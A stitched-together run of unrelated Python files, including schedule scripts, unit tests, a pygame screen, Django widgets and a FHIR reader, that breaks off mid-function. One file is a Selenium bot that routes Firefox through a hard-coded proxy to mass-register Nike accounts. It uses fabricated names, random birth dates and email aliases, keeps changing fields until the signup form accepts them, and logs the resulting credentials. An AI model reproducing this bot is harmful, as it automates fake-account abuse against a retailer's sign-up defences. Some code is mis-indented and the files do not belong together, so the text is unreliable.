    """Ask the user for org/faculty/group, fetch the exam schedule,
    print it and save it to exams.json."""
    org, faculty, group = input_org_info()
    access_token, refresh_token = login(ip, port, username, password)
    schedule = get_exams(ip, port, access_token, org, faculty, group)
    # Same nested layout as the class-schedule export.
    data = {
        org: {
            faculty: {
                group: schedule
            }
        }
    }
    print('Расписание экзаменов:')
    print(json.dumps(data, indent=4, sort_keys=True, ensure_ascii=False))
    with open('exams.json', 'w') as outfile:
        json.dump(data, outfile, indent=4, sort_keys=True)
    # Bug fix: the message previously claimed the data was saved to
    # schedule.json, but this function writes exams.json.
    print('Расписание экзаменов группы сохранено в exams.json')
|
from selenium import webdriver
import time
from selenium.webdriver.support.ui import Select
from random import randint
from random import choice
import string
from selenium.webdriver.common.proxy import *
from lxml import html
def set_profile(pr):
    """Build a Firefox profile routing HTTP and SSL traffic through the
    proxy described by pr ({'ip': ..., 'port': ...})."""
    profile = webdriver.FirefoxProfile()
    profile.set_preference("network.proxy.type", 1)  # 1 = manual proxy config
    profile.set_preference("network.proxy.http", pr['ip'])
    profile.set_preference("network.proxy.http_port", int(pr['port']))
    profile.set_preference("network.proxy.ssl", pr['ip'])
    profile.set_preference("network.proxy.ssl_port", int(pr['port']))
    return profile
def new_user():
    """Return a blank user record with every account field set to ''."""
    fields = ("fname", "lname", "email", "password", "month", "date", "year")
    return {field: "" for field in fields}
def gen_dob():
    """Return a random date of birth formatted 'MM:DD:YYYY'.

    Year in 1980..1996; day capped at 28 so any month is valid.
    """
    # Draw in the same order as before: year, month, then day.
    year = str(randint(1980, 1996))
    month = str(randint(1, 12)).zfill(2)
    day = str(randint(1, 28)).zfill(2)
    return ":".join((month, day, year))
def get_email():
user = new_user()
fp = open("config.txt", "r")
email = fp.read()
email = email.strip()
email = email.split(":")
username = email[0].split("@")
username[0] = username[0] + '+_' + str(randint(20, 99)) + choice(string.letters)
username = "@".join(username)
email[0] = username
email = ':'.join(email)
return email
def gen_name():
    """Return a random 'First:Last' name drawn from two fixed pools."""
    surnames = [
        "Carnegie", "Roberts", "Clinton", "Joyce", "Holder", "Smith",
        "Owens", "Louden", "Steffey", "Rouse", "Stagner", "Chausse",
        "White", "Brewster", "Kelly", "Gurley", "Morales", "Grimes",
    ]
    given_names = [
        "Alfred", "Andrew", "Martin", "Harry", "Tom", "Michael", "Peter",
        "Robert", "Frank", "Matthew", "Donald", "Phillip", "Paul", "Dale",
        "Christian", "Maria", "Stephanie", "Evelyn", "Caitlyn", "Sonny",
        "Julia",
    ]
    # Same draw order as before (first name, then surname) so seeded runs
    # reproduce the original results.
    first = given_names[randint(0, len(given_names) - 1)]
    last = surnames[randint(0, len(surnames) - 1)]
    return ":".join((first, last))
def gen_user():
    """Assemble a complete random user record (name, DOB, credentials)."""
    user = new_user()
    first, last = gen_name().split(":")
    month, day, year = gen_dob().split(":")
    credentials = get_email().split(":")
    user['email'] = credentials[0]
    user['password'] = credentials[1]
    user['month'] = month
    user['date'] = day
    user['year'] = year
    user['fname'] = first
    user['lname'] = last
    print("New user details generated are \n" + str(user))
    return user
def write_to_log(fname, lname, email, password):
    """Append one account record to log.csv as 'fname,lname,email,password'.

    Fixes: the status message was missing a space before 'to file.', and
    the file handle is now closed via a context manager.
    """
    print("Writing " + email + ":" + password + " to file.")
    with open("log.csv", "a+") as fp:
        fp.write(fname + "," + lname + "," + email + "," + password + "\n")
def main():
    """Drive Firefox through a proxy to mass-create Nike accounts found via
    a DuckDuckGo search, logging each created account to log.csv."""
    # Hard-coded proxy endpoint for all traffic.
    pr = {'ip':'34.206.205.194','port':'41700'}
    # NOTE(review): input() returns str on Python 3, yet 'num += 1' and
    # 'i == num' below treat it as an int — this script appears to target
    # Python 2; confirm before running under Python 3.
    num = input("How many accounts? ")
    profile = set_profile(pr)
    driver = webdriver.Firefox(firefox_profile=profile)
    i = 0  # number of accounts completed so far
    while(1):
        user = gen_user()
        # Each navigation step retries the whole iteration on any failure,
        # bumping 'num' so the failed attempt does not count.
        try:
            search_url = "https://duckduckgo.com/?q=nike+launch"
            driver.get(search_url)
        except:
            print("Looks like the page is acting weird. RELOADIN'!")
            num += 1;
            continue
        try:
            # First search result -> Nike site.
            div = driver.find_element_by_id("r1-0")
            link = div.find_element_by_class_name("result__a")
            link.click()
            time.sleep(2);
        except:
            print("Looks like the page is acting weird. RELOADIN'!")
            num += 1
            continue
        try:
            # Open the login pane, then the sign-up form.
            login = driver.find_element_by_xpath("/html/body/div[3]/div/header/div/div/nav/div[2]/a[1]")
            login.click()
            time.sleep(2)
            signup_btn = driver.find_element_by_link_text("Join now.")
            signup_btn.click()
            time.sleep(2)
        except:
            print("Looks like the page is acting weird. RELOADIN'!")
            num += 1
            continue
        # Fill in the registration form from the generated user record.
        email_field = driver.find_element_by_name("emailAddress")
        email_field.send_keys(user['email'])
        time.sleep(2);
        password_field = driver.find_element_by_name("password")
        password_field.send_keys(user['password'])
        fname_field = driver.find_element_by_name("firstName")
        fname_field.send_keys(user['fname'])
        lname_field = driver.find_element_by_name("lastName")
        lname_field.send_keys(user['lname'])
        month_select = Select(driver.find_element_by_id("nike-unite-date-id-mm"))
        month_select.select_by_value(user['month'])
        time.sleep(3);
        date_select = Select(driver.find_element_by_id("nike-unite-date-id-dd"))
        date_select.select_by_value(user['date'])
        time.sleep(2);
        year_select = Select(driver.find_element_by_id("nike-unite-date-id-yyyy"))
        year_select.select_by_value(user['year'])
        time.sleep(2);
        # Pick a gender radio button at random (by scanning span labels).
        # NOTE(review): if no span matches, 'gender' stays unbound and the
        # click below raises NameError — confirm the page always has both.
        spans = driver.find_elements_by_tag_name("span")
        rand = randint(0,1000)
        for span in spans:
            if(rand%2 == 0):
                if "Male" in span.text:
                    gender = span
                else:
                    continue
            else:
                if "Female" in span.text:
                    gender = span
                else:
                    continue
        gender.click()
        gender.click()
        submit = driver.find_element_by_class_name("joinSubmit")
        submit_btn = submit.find_element_by_tag_name("input")
        submit_btn.click()
        submit_btn.click()
        # While the DOB selector is still present the form was rejected:
        # jiggle the date values and resubmit until it goes through.
        while(1):
            try:
                update_select = driver.find_element_by_id("nike-unite-date-id-yyyy")
                try:
                    time.sleep(2);
                    rand = randint(1000, 100000);
                    if(rand%2 == 1):
                        month_select.select_by_value(str(int(user['month']) + randint(-3,0)))
                    else:
                        date_select.select_by_value(str(int(user['date']) + randint(-4,2)))
                    update_select.click()
                    gender.click()
                    submit_btn.click()
                    submit_btn.click()
                except:
                    continue
            except:
                # Selector gone -> the account was accepted.
                print("Done "+ str(i+1) + " accounts!")
                break
        i += 1
        if(i == num):
            break;
        write_to_log(user['fname'], user['lname'], user['email'], user['password'])
        time.sleep(15);

if __name__ == "__main__":
    main()
|
import unittest
from reinvent_scoring import ScoringFunctionComponentNameEnum, ComponentParameters
class BaseTestMatchingSubstructure(unittest.TestCase):
    """Shared setUp for matching-substructure scoring-component tests.

    NOTE(review): relies on self.smiles being provided by a subclass
    before setUp runs — confirm subclasses define it as a class attribute.
    """
    def setUp(self):
        sf_enum = ScoringFunctionComponentNameEnum()
        # Component under test: fixed name/weight, subclass-supplied SMILES.
        self.parameters = ComponentParameters(component_type=sf_enum.MATCHING_SUBSTRUCTURE,
                                              name="matching_substructure",
                                              weight=1.,
                                              specific_parameters={"smiles":self.smiles})
|
"""
File: Milestone1.py
Name:
-----------------------
This file tests the milestone 1 for
our babyname.py project
"""
import sys
def add_data_for_name(name_data, year, rank, name):
    """Record *rank* for (*name*, *year*) in *name_data*, in place.

    name_data maps name -> {year: rank}; years and ranks are strings but
    ranks compare numerically, and the best (lowest) rank wins when the
    same name/year is added twice.

    Simplification: the original rebuilt the whole per-name dict on every
    call; updating the one affected year is equivalent and clearer.
    """
    years = name_data.setdefault(name, {})
    current = years.get(year)
    if current is None or int(rank) < int(current):
        years[year] = rank
# ------------- DO NOT EDIT THE CODE BELOW THIS LINE ---------------- #
def test1():
    """New name, new year: Kate/2010/208 is simply inserted."""
    name_data = {'Kylie':{'2010':'57'}, 'Nick':{'2010':'37'}}
    add_data_for_name(name_data, '2010', '208', 'Kate')
    print('--------------------test1----------------------')
    print(str(name_data))
    print('-----------------------------------------------')

def test2():
    """Existing name, new year: 2000 is added to Kylie's entry."""
    name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}
    add_data_for_name(name_data, '2000', '104', 'Kylie')
    print('--------------------test2----------------------')
    print(str(name_data))
    print('-----------------------------------------------')

def test3():
    """Existing name and year: the better (lower) rank 90 replaces 200."""
    name_data = {'Kylie': {'2010': '57'},'Sammy': {'1980':'451','1990': '200'}}
    add_data_for_name(name_data, '1990', '90', 'Sammy')
    print('-------------------test3-----------------------')
    print(str(name_data))
    print('-----------------------------------------------')

def test4():
    """Combined sequence exercising all three cases above."""
    name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}
    add_data_for_name(name_data, '2010', '208', 'Kate')
    add_data_for_name(name_data, '2000', '108', 'Kate')
    add_data_for_name(name_data, '1990', '200', 'Sammy')
    add_data_for_name(name_data, '1990', '90', 'Sammy')
    add_data_for_name(name_data, '2000', '104', 'Kylie')
    print('--------------------test4----------------------')
    print(str(name_data))
    print('-----------------------------------------------')

def main():
    """Dispatch to one of the test cases named on the command line."""
    args = sys.argv[1:]
    if len(args) == 1 and args[0] == 'test1':
        test1()
    elif len(args) == 1 and args[0] == 'test2':
        test2()
    elif len(args) == 1 and args[0] == 'test3':
        test3()
    elif len(args) == 1 and args[0] == 'test4':
        test4()

if __name__ == "__main__":
    main()
|
''' Skelly "Taffer presents..." screen class.
By Chris Herborth (https://github.com/Taffer)
MIT license, see LICENSE.md for details.
'''
import pygame
from .ScreenBase import ScreenBase
from ..ui import ColorFade
from ..ui import ImageButton
from ..ui import Label
BLACK = pygame.Color('black')
# BLACK, but fully transparent. Bug fix: the blue channel previously used
# BLACK.g instead of BLACK.b (harmless for pure black, but a latent typo).
BLACK_ALPHA = pygame.Color(BLACK.r, BLACK.g, BLACK.b, 0)
WHITE = pygame.Color('white')
class PresentsScreen(ScreenBase):
    """'Taffer presents...' splash screen: fades in the logos, waits a
    couple of seconds, fades out, then advances to the Title screen."""

    def __init__(self, game) -> None:
        super().__init__(game)
        self.next_screen = 'Title'
        # Start the theme music at the configured volume.
        # NOTE(review): pygame.mixer.music.load() returns None, so this
        # stores None in resources['music']['theme'] — confirm intent.
        self.game.resources['music']['theme'] = pygame.mixer.music.load('music/Heroic Demise (New).ogg')
        pygame.mixer.music.set_volume(self.game.settings.get('music_volume') * self.game.settings.get('overall_volume'))
        pygame.mixer.music.play()
        # Load fonts and splash images into the shared resource cache.
        self.game.resources['fonts']['default_serif'] = pygame.freetype.Font('fonts/A_Font_with_Serifs.ttf', 72)
        self.game.resources['fonts']['default_mono'] = pygame.freetype.Font('fonts/LiberationMono-Bold.ttf', 16)
        self.game.resources['fonts']['germania'] = pygame.freetype.Font('fonts/GermaniaOne-Regular.ttf', 18)
        self.game.resources['images']['pygame_logo'] = pygame.image.load('graphics/pygame-logo.png').convert_alpha()
        self.game.resources['images']['taffer'] = pygame.image.load('graphics/taffer-ronos.png').convert_alpha()
        presents_text = self.game.text.get_text('presents')
        self.taffer_text = presents_text['taffer_text']
        self.pygame_text = presents_text['pygame_text']
        # Fade-in from black over one second; fade-out is created later.
        self.fade = ColorFade(BLACK, BLACK_ALPHA, 1)  # 1 second fade
        self.fade_out = False
        self.exit_countdown = 2  # Seconds after fade to auto-exit.
        # Static UI: two centred images and two centred labels.
        self.ui = []
        rect = self.game.resources['images']['taffer'].get_rect()
        self.ui.append(ImageButton((self.game.screen_width - rect.width) / 2, 120, self.game.resources['images']['taffer']))
        rect = self.game.resources['images']['pygame_logo'].get_rect()
        self.ui.append(ImageButton((self.game.screen_width - rect.width) / 2, 580, self.game.resources['images']['pygame_logo']))
        self.ui.append(Label(self.game.screen_width / 2, 16, self.taffer_text, self.game.resources['fonts']['default_serif'],
                             WHITE, 'centre'))
        self.ui.append(Label(self.game.screen_width / 2, 640, self.pygame_text, self.game.resources['fonts']['germania'],
                             WHITE, 'centre'))

    def draw(self) -> None:
        """Draw the UI, then the fade overlay on top."""
        self.game.surface.fill(BLACK)
        for item in self.ui:
            item.draw()
        self.fade.draw()

    def update(self, dt: float) -> None:
        """Advance the fade; after the fade-in, count down and start the
        fade-out, whose completion marks the screen as exitable."""
        self.fade.update(dt)
        if self.fade_out:
            # If we're fading out...
            if self.fade.is_done():
                self.can_exit = True
        else:
            # If we're fading in...
            if self.fade.is_done():
                self.exit_countdown = self.exit_countdown - dt
                if self.exit_countdown < 0:
                    self.fade = ColorFade(BLACK_ALPHA, BLACK, 1)
                    self.fade_out = True
|
# from .views import heartbeat
def test_heartbeat(client):
    """/heartbeat/ responds 200 with the 'simple' mode payload."""
    response = client.get('/heartbeat/')
    assert response.status_code == 200
    data = response.json()
    assert data['mode'] == 'simple'
    assert data['status'] == 'running'

def test_heartbeat_no_ending_slash(client):
    """Without the trailing slash the URL is permanently redirected."""
    response = client.get('/heartbeat')
    assert response.status_code == 301

def test_heartbeat_redis(client):
    """/heartbeat/redis/ reports a Redis-backed hit counter that grows by
    exactly one per request."""
    # 1st request
    response = client.get('/heartbeat/redis/')
    assert response.status_code == 200
    data = response.json()
    assert data['mode'] == 'redis'
    assert data['status'] == 'running'
    hit1 = data['hits']
    assert hit1 > 0
    # 2nd request
    response2 = client.get('/heartbeat/redis/')
    assert response2.status_code == 200
    data2 = response2.json()
    hit2 = data2['hits']
    assert hit1 + 1 == hit2
|
# For each of t test cases: read the two list sizes (unused beyond parsing),
# then the two lists, and print the size of their intersection.
t = int(input())
for _ in range(t):
    n, m = map(int, input().split())
    # Idiom fix: set(map(...)) directly — no throwaway list materialization.
    a = set(map(int, input().split()))
    b = set(map(int, input().split()))
    print(len(a.intersection(b)))
# ------------------------------------------------------------------------
# coding=utf-8
# ------------------------------------------------------------------------
"""
Media library-based file inclusion tool. Can handle any type of media file,
not only images.
"""
import warnings
from django import forms
from django.conf import settings
from django.contrib.admin.widgets import AdminRadioSelect
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.db import models
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from feincms.admin.item_editor import ItemEditorForm
from feincms.module.medialibrary.models import MediaFile
from feincms.module.medialibrary.thumbnail import admin_thumbnail
warnings.warn("The contents of feincms.content.medialibrary.models will be replaced"
" with feincms.content.medialibrary.v2 in FeinCMS v1.7. The old media file content"
" here interferes with Django's raw_id_fields and is generally messy.",
DeprecationWarning, stacklevel=2)
class MediaFileWidget(forms.TextInput):
    """
    TextInput widget, shows a link to the current value if there is one.
    """
    def render(self, name, value, attrs=None):
        # Render the plain text input first; wrap it with a preview below
        # when the current value resolves to an existing MediaFile.
        inputfield = super(MediaFileWidget, self).render(name, value, attrs)
        if value:
            try:
                mf = MediaFile.objects.get(pk=value)
            except MediaFile.DoesNotExist:
                # Stale pk: fall back to the bare input field.
                return inputfield
            try:
                caption = mf.translation.caption
            except (AttributeError, ObjectDoesNotExist):
                # No translation/caption available for this file.
                caption = _('(no caption)')
            # Optional admin thumbnail preview (images only).
            image = admin_thumbnail(mf)
            if image:
                image = u'<img src="%(url)s" alt="" /><br />' % {'url': image}
            else:
                image = u''
            return mark_safe(u"""
            <div style="margin-left:10em">%(image)s
            <a href="%(url)s" target="_blank">%(caption)s - %(url)s</a><br />
            %(inputfield)s
            </div>""" % {
                'image': image,
                'url': mf.file.url,
                'caption': caption,
                'inputfield': inputfield})
        return inputfield
# FeinCMS connector
class MediaFileContent(models.Model):
    """
    Create a media file content as follows::

        Page.create_content_type(MediaFileContent, POSITION_CHOICES=(
            ('default', _('Default')),
            ('lightbox', _('Lightbox')),
            ('whatever', _('Whatever')),
            ))

    For a media file of type 'image' and position 'lightbox', the following
    templates are tried in order:

    * content/mediafile/image_lightbox.html
    * content/mediafile/image.html
    * content/mediafile/lightbox.html
    * content/mediafile/default.html

    The context contains ``content`` and ``request`` (if available).
    """
    feincms_item_editor_includes = {
        'head': ['admin/content/mediafile/init.html'],
    }

    class Meta:
        abstract = True
        verbose_name = _('media file')
        verbose_name_plural = _('media files')

    @classmethod
    def initialize_type(cls, POSITION_CHOICES=None, MEDIAFILE_CLASS=MediaFile):
        """Called once by ``create_content_type``: dynamically attaches the
        concrete model fields and the admin form to the generated class.

        NOTE: this file is Python 2 code (``raise Exc, msg`` syntax below).
        """
        warnings.warn('feincms.content.medialibrary.models.MediaFileContent is deprecated.'
            ' Use feincms.content.medialibrary.v2.MediaFileContent instead.',
            DeprecationWarning, stacklevel=2)
        if 'feincms.module.medialibrary' not in settings.INSTALLED_APPS:
            raise ImproperlyConfigured, 'You have to add \'feincms.module.medialibrary\' to your INSTALLED_APPS before creating a %s' % cls.__name__
        if POSITION_CHOICES is None:
            raise ImproperlyConfigured, 'You need to set POSITION_CHOICES when creating a %s' % cls.__name__
        cls.add_to_class('mediafile', models.ForeignKey(MEDIAFILE_CLASS, verbose_name=_('media file'),
            related_name='%s_%s_set' % (cls._meta.app_label, cls._meta.module_name)
            ))
        cls.add_to_class('position', models.CharField(_('position'),
            max_length=10, choices=POSITION_CHOICES,
            default=POSITION_CHOICES[0][0]))

        # Defined inside initialize_type so the form can close over the
        # POSITION_CHOICES / MEDIAFILE_CLASS supplied at creation time.
        class MediaFileContentAdminForm(ItemEditorForm):
            mediafile = forms.ModelChoiceField(queryset=MEDIAFILE_CLASS.objects.all(),
                widget=MediaFileWidget, label=_('media file'))
            position = forms.ChoiceField(choices=POSITION_CHOICES,
                initial=POSITION_CHOICES[0][0], label=_('position'),
                widget=AdminRadioSelect(attrs={'class': 'radiolist'}))

        cls.feincms_item_editor_form = MediaFileContentAdminForm

    def render(self, **kwargs):
        """Render the most specific template available: <type>_<position>,
        then <type>, then <position>, finally the default."""
        return render_to_string([
            'content/mediafile/%s_%s.html' % (self.mediafile.type, self.position),
            'content/mediafile/%s.html' % self.mediafile.type,
            'content/mediafile/%s.html' % self.position,
            'content/mediafile/default.html',
        ], { 'content': self }, context_instance=kwargs.get('context'))

    @classmethod
    def default_create_content_type(cls, cms_model):
        """Convenience creator with a standard block/left/right position set."""
        return cms_model.create_content_type(cls, POSITION_CHOICES=(
            ('block', _('block')),
            ('left', _('left')),
            ('right', _('right')),
        ))
|
from abc import ABC, abstractmethod
from ..utils import *
import pandas as pd
class AbstractBatchTransformation(ABC):
    """
    An abstract class for transformations to be applied
    to input data.
    """

    @abstractmethod
    def __init__(self, **kwargs):
        """
        Initializes the transformation and provides an
        opportunity to supply a configuration if needed
        """
        pass

    @abstractmethod
    def __call__(self, batch):
        """
        Apply the transformation to a batch of (X, y)
        pairs

        Parameters
        ----------
        batch : list-like
            The batch of text inputs and associated targets
        """
        pass

    @abstractmethod
    def get_task_configs(self, task_name=None, tran_type=None, label_type=None):
        """
        See self._get_task_configs()
        """
        pass

    def _get_task_configs(self, tran_types, task_name=None, tran_type=None, label_type=None):
        """
        Defines the task and type of transformation (SIB or INV)
        to determine the effect on the expected behavior (whether
        to change the label if SIB, or leave the label alone if INV).

        Parameters
        ----------
        tran_types : dict
            Column-name -> list-of-values mapping describing the supported
            (task_name, tran_type, label_type) combinations.
        task_name : str
            Filters the results for the requested task.
        tran_type : str
            Filters the results for the requested trans type,
            which is either 'INV' or 'SIB'.
        label_type : str
            Filters the results for the requested label type,
            which is either 'hard' or 'soft'.

        Returns
        -------
        df : pandas.DataFrame
            A pandas DataFrame containing:
            - task_name : str
                short description of the task
            - tran_type : str
                INV == invariant ==> output behavior does
                not change
                SIB == sibylvariant ==> output behavior
                changes in some way
            - label_type : str
                whether to use soft or hard labels

        Raises
        ------
        ValueError
            If a requested filter value is not present in ``tran_types``.
        """
        df = pd.DataFrame.from_dict(tran_types)
        if task_name is not None:
            task_names = set(df.task_name.tolist())
            if task_name not in task_names:
                raise ValueError('The selected task must be one of the following: {}'.format(', '.join(task_names)))
            df = df[df['task_name'] == task_name]
        if tran_type is not None:
            tran_types = set(df.tran_type.tolist())
            if tran_type not in tran_types:
                raise ValueError('The selected tran type must be one of the following: {}'.format(', '.join(tran_types)))
            df = df[df['tran_type'] == tran_type]
        if label_type is not None:
            label_types = set(df.label_type.tolist())
            if label_type not in label_types:
                # Bug fix: this message previously joined ``tran_types``,
                # listing the wrong set of valid values.
                raise ValueError('The selected label type must be one of the following: {}'.format(', '.join(label_types)))
            df = df[df['label_type'] == label_type]
        return df
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import unittest
from superset.utils.log import DBEventLogger, get_event_logger_from_cfg_value
class TestEventLogger(unittest.TestCase):
    def test_returns_configured_object_if_correct(self):
        """A concrete AbstractEventLogger instance is passed through unchanged."""
        logger_obj = DBEventLogger()
        result = get_event_logger_from_cfg_value(logger_obj)
        self.assertIs(result, logger_obj)

    def test_event_logger_config_class_deprecation(self):
        """Assigning a class (not an instance) warns but still works."""
        result = None
        with self.assertLogs(level="WARNING"):
            result = get_event_logger_from_cfg_value(DBEventLogger)
        # the class is instantiated on our behalf
        self.assertIsInstance(result, DBEventLogger)

    def test_raises_typerror_if_not_abc_impl(self):
        """Anything not derived from AbstractEventLogger raises TypeError."""
        with self.assertRaises(TypeError):
            get_event_logger_from_cfg_value(logging.getLogger())
|
class Resp(dict):
    """A dict-shaped API response envelope with data/code/msg keys."""

    def __init__(self, data=None, code=200, msg="success"):
        super().__init__()
        # Populate the envelope in a single call.
        self.update(data=data, code=code, msg=msg)
class SimpleFhirR4Reader(object):
    """
    A lightweight accessor for a FHIR R4 resource. Not intended to replace the fhirclient library.
    This class does not attempt any validation or impose any structure. It is only intended to aid in
    reading from FHIR-like data structures.
    When performing list lookups, return the first item in the list that matches the given parameters.
    """

    def __init__(self, fhir_data_structure, root=None):
        # ``_root`` is the reader used to resolve {"reference": ...} objects
        # against the resource's ``contained`` entries.
        # NOTE(review): nested readers receive root=self (one level up), not
        # the document top -- confirm deeply nested references still resolve.
        self._root = root or self
        self._obj = fhir_data_structure

    def get(self, *lookup_path, **dict_lookup_keys):
        """Walk ``lookup_path`` into the wrapped structure.

        Each path element may be a dict key, a list index, a callable
        predicate, or (via keyword args) a dict of field filters matched
        against list items. Reference objects are resolved transparently;
        dict/list results come back wrapped in a new SimpleFhirR4Reader.
        """
        obj = self._obj
        if dict_lookup_keys:
            lookup_path = lookup_path + (dict_lookup_keys,)
        for key in lookup_path:
            obj = self._lookup_obj_key(obj, key)
            if self.is_reference(obj):
                obj = self._resolve_reference(obj)
        if isinstance(obj, (list, dict)):
            return SimpleFhirR4Reader(obj, root=self)
        return obj

    def __getattr__(self, item):
        # Attribute access is sugar for ``get`` (e.g. reader.name).
        try:
            return self.get(item)
        except (ValueError, KeyError):
            raise AttributeError("{!r} can't be found in {!r}".format(item, self._obj))

    def __getitem__(self, item):
        # Slices are served directly from an underlying list, without wrapping.
        if isinstance(item, slice):
            if isinstance(self._obj, list):
                return self._obj[item]
            raise TypeError("{!r} can't be found in {!r}".format(item, self._obj))
        try:
            return self.get(item)
        except ValueError:
            # Translate lookup failures into the conventional container errors.
            if isinstance(self._obj, list):
                raise IndexError("{!r} can't be found in {!r}".format(item, self._obj))
            raise KeyError("{!r} can't be found in {!r}".format(item, self._obj))

    @staticmethod
    def is_reference(obj):
        # A reference is a dict whose ONLY key is "reference".
        return isinstance(obj, dict) and list(obj.keys()) == ["reference"]

    def _resolve_reference(self, obj):
        # Handles both "Type/id" and "#id" style references; both resolve
        # against the root resource's ``contained`` list.
        reference_parts = obj["reference"].split("/")
        reference_type = None
        try:
            reference_type, reference_id = reference_parts
        except ValueError:
            reference_id = reference_parts[0]
        reference_id = reference_id.lstrip("#")
        if reference_type:
            return self._root.contained.get(id=reference_id, resourceType=reference_type)
        return self._root.contained.get(id=reference_id)

    @staticmethod
    def _lookup_obj_key(obj, key):
        """Apply a single lookup step; raises ValueError when unsupported."""
        if isinstance(obj, dict):
            if callable(key):
                return list(filter(key, list(obj.items())))
            return obj[key]
        if isinstance(obj, list):
            if isinstance(key, dict):  # dict key based lookup
                for x in obj:
                    if _dict_has_values(x, **key):
                        return x
            if isinstance(key, int):
                return obj[key]
            if callable(key):
                return list(filter(key, obj))
        raise ValueError("could not lookup '{!r}' from {!r}".format(key, obj))
def _dict_has_values(obj, **queries):
for key, value in list(queries.items()):
try:
if obj[key] != value:
return False
except KeyError:
return False
return True
|
# coding: UTF-8
from functools import reduce

import networkx as nx

# pygraphviz is optional: it is only needed by draw_document_graph().
try:
    import pygraphviz as pgv
except Exception:
    print("No graphviz")
    pass
def create_document_graph(document_item):
    """Build a weighted DiGraph over all token nodes of a document.

    Nodes are the tokens of every sentence (labelled with their lemma);
    edges come from each token's arcs, weighted so that shortest-path
    search prefers coreference/dependency links over plain adjacency.
    """
    graph = nx.DiGraph()
    # Flatten sentence node lists into one document-wide node list.
    all_nodes = reduce(lambda acc, cur: acc + cur,
                       [sent["nodes"] for sent in document_item["sentences"]])
    for idx in range(len(all_nodes)):
        graph.add_node(idx, label=all_nodes[idx]["lemma"])
    # Add edges with link-type-dependent weights.
    for idx, node in enumerate(all_nodes):
        for arc in node["arcs"]:
            link = arc["label"]
            if link.startswith("adjsent:"):
                # Connection via coreference is better than simple adjacency.
                weight = 10.0
            elif link.startswith("coref:"):
                weight = 1.0
            elif link.startswith(("deparc:", "depinv:")):
                weight = 1.0
            else:
                continue
            target = arc["toIndex"]
            # Skip link to ROOT (negative index on either side).
            if min(idx, target) < 0:
                continue
            graph.add_edge(idx, target, label=link, weight=weight)
    return graph
def draw_document_graph(document_item, output="tmp.png"):
    """Render the document graph to an image file using graphviz fdp layout."""
    graph = create_document_graph(document_item)
    # Shrink edge label font before handing off to graphviz.
    for src, dst in graph.edges:
        graph[src][dst]["fontsize"] = 10
    agraph = nx.nx_agraph.to_agraph(graph)
    agraph.draw(output, prog="fdp")
class PatternPairwiseShortestPath(object):
    """Canonical, hashable representation of the pairwise shortest paths
    between entities in a document graph.

    Graph node indices are remapped to a compact local numbering so that
    two documents with the same path structure compare equal and hash
    identically.
    """

    def __init__(self, doc_graph, n_entity, min_paths):
        u"""
        min_path: (from_ent_ind, to_ent_ind) -> path
        path is list of index of node in the document graph
        """
        def get_link_name(i_from, i_to):
            # Decorate an edge label with direction arrows.
            link = doc_graph.edges[i_from, i_to]["label"]
            # NOTE(review): ``flip`` is always False, so the arrow is always
            # "->"; presumably a leftover from a bidirectional variant.
            flip = False
            arrow = "<-" if flip else "->"
            link = "{}{}{}".format(arrow, link, arrow)
            return link

        contained_links = []  # list of (from_ind, to_ind, link_label)
        new_paths_dict = {}   # (ent_i, ent_j) -> remapped path tuple
        node_ind_lst = []     # graph node index -> local index (by position)
        node_lemma_lst = []   # lemma of each locally-indexed node
        new_paths = []
        for i_ent1 in range(n_entity):
            for i_ent2 in range(n_entity):
                if i_ent2 == i_ent1:
                    continue
                path = min_paths[i_ent1, i_ent2]
                # Register every intermediate node (endpoints excluded).
                for node_ind in path[1:-1]:
                    if node_ind not in node_ind_lst:
                        node_ind_lst.append(node_ind)
                        node_lemma_lst.append(doc_graph.nodes[node_ind]["label"])
                # Rewrite the path as alternating local indices and link names.
                new_path = []
                for i_pos in range(len(path)-1):
                    if i_pos != 0:
                        new_path.append(node_ind_lst.index(path[i_pos]))
                    link = get_link_name(path[i_pos], path[i_pos+1])
                    new_path.append(link)
                    i_from, i_to = path[i_pos], path[i_pos+1]
                    contained_links.append(
                        (i_from, i_to, doc_graph.edges[i_from, i_to]["label"])
                    )
                new_paths.append(tuple(new_path))
                new_paths_dict[(i_ent1, i_ent2)] = tuple(new_path)
        # Stored as tuples so the pattern is hashable (see __hash__).
        self.node_lemma = tuple(node_lemma_lst)
        self.new_paths = tuple(new_paths)
        self.contained_links = set(contained_links)
        self.new_paths_dict = new_paths_dict

    def get_subpaths(self):
        """Return [(entity_pair, path)] with local indices replaced by lemmas."""
        paths = []
        for _k, _p in self.new_paths_dict.items():
            p = []
            for tok in _p:
                if isinstance(tok, int):
                    tok = self.node_lemma[tok]
                p.append(tok)
            paths.append((_k, tuple(p)))
        return paths

    def __eq__(self, other):
        # Equality/hash deliberately ignore contained_links and the dict:
        # lemmas plus remapped paths fully determine the pattern.
        if not isinstance(other, PatternPairwiseShortestPath):
            return False
        return (self.node_lemma == other.node_lemma) and (self.new_paths == other.new_paths)

    def __hash__(self):
        return hash((self.node_lemma, self.new_paths))

    def __str__(self):
        return str((self.node_lemma, self.new_paths))
def extract_pairwise_shortest_paths(document_item):
    """Compute shortest paths between every ordered entity pair and wrap
    them in a PatternPairwiseShortestPath.

    Returns None when any entity has no token indices; raises if a pair of
    entities is not connected in the document graph.
    """
    if min([len(ent["indices"]) for ent in document_item["entities"]]) < 1:
        print("There is an entity with no indices.")
        return None
    doc_graph = create_document_graph(document_item)
    # Find pairwise shortest paths between each entity pairs.
    min_paths = {}
    for i_ent1, entity1 in enumerate(document_item["entities"]):
        for i_ent2, entity2 in enumerate(document_item["entities"]):
            if i_ent2 == i_ent1:
                continue
            # Find shortest path. Entities may span several tokens, so try
            # every (from-token, to-token) pair and keep the shortest.
            min_length = None
            min_path = None
            for from_ind in entity1["indices"]:
                for to_ind in entity2["indices"]:
